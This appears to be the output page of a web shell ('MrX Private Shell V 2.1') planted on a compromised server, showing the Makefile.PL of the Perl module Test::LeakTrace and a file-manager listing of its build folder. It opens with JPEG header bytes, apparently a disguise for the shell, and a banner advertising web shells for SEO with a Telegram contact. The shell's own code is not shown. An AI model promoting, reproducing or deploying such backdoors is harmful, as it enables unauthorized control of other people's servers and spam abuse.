����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!perl
use strict;
use warnings;
use ExtUtils::MakeMaker;
WriteMakefile(
NAME => 'Test::LeakTrace',
VERSION_FROM => 'lib/Test/LeakTrace.pm',
AUTHOR => 'FUJI Goro',
LICENSE => 'perl',
PREREQ_PM => {
'Exporter' => 5.57,
},
TEST_REQUIRES => {
'Test::More' => 0.62
},
OBJECT => '$(O_FILES)',
clean => {FILES => q(
Test-LeakTrace-* *.stackdump
*.gcda *.gcno *.gcov
nytprof *.out
cover_db
)},
(eval { ExtUtils::MakeMaker->VERSION(6.46) } ? (META_MERGE => {
'meta-spec' => { version => 2 },
resources => {
license => 'http://dev.perl.org/licenses/',
homepage => 'https://metacpan.org/release/Test-LeakTrace',
repository => {
type => 'git',
url => 'https://github.com/gfx/p5-Test-LeakTrace.git',
web => 'https://github.com/gfx/p5-Test-LeakTrace',
},
bugtracker => {
web => 'https://github.com/gfx/p5-Test-LeakTrace/issues',
},
},
}):()),
test => {
RECURSIVE_TEST_FILES => 1,
},
);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| benchmark | Folder | 0755 |
|
|
| blib | Folder | 0755 |
|
|
| example | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| xt | Folder | 0755 |
|
|
| Changes | File | 2.3 KB | 0644 |
|
| LeakTrace.bs | File | 0 B | 0644 |
|
| LeakTrace.c | File | 20.15 KB | 0644 |
|
| LeakTrace.o | File | 283.3 KB | 0644 |
|
| LeakTrace.xs | File | 12.38 KB | 0644 |
|
| MANIFEST | File | 898 B | 0644 |
|
| MANIFEST.SKIP | File | 680 B | 0644 |
|
| META.json | File | 1.39 KB | 0644 |
|
| META.yml | File | 763 B | 0644 |
|
| MYMETA.json | File | 1.39 KB | 0644 |
|
| MYMETA.yml | File | 763 B | 0644 |
|
| Makefile | File | 38.28 KB | 0644 |
|
| Makefile.PL | File | 1.12 KB | 0644 |
|
| README | File | 519 B | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|
| ppport.h | File | 74.61 KB | 0644 |
|
| ptr_table.h | File | 4.06 KB | 0644 |
|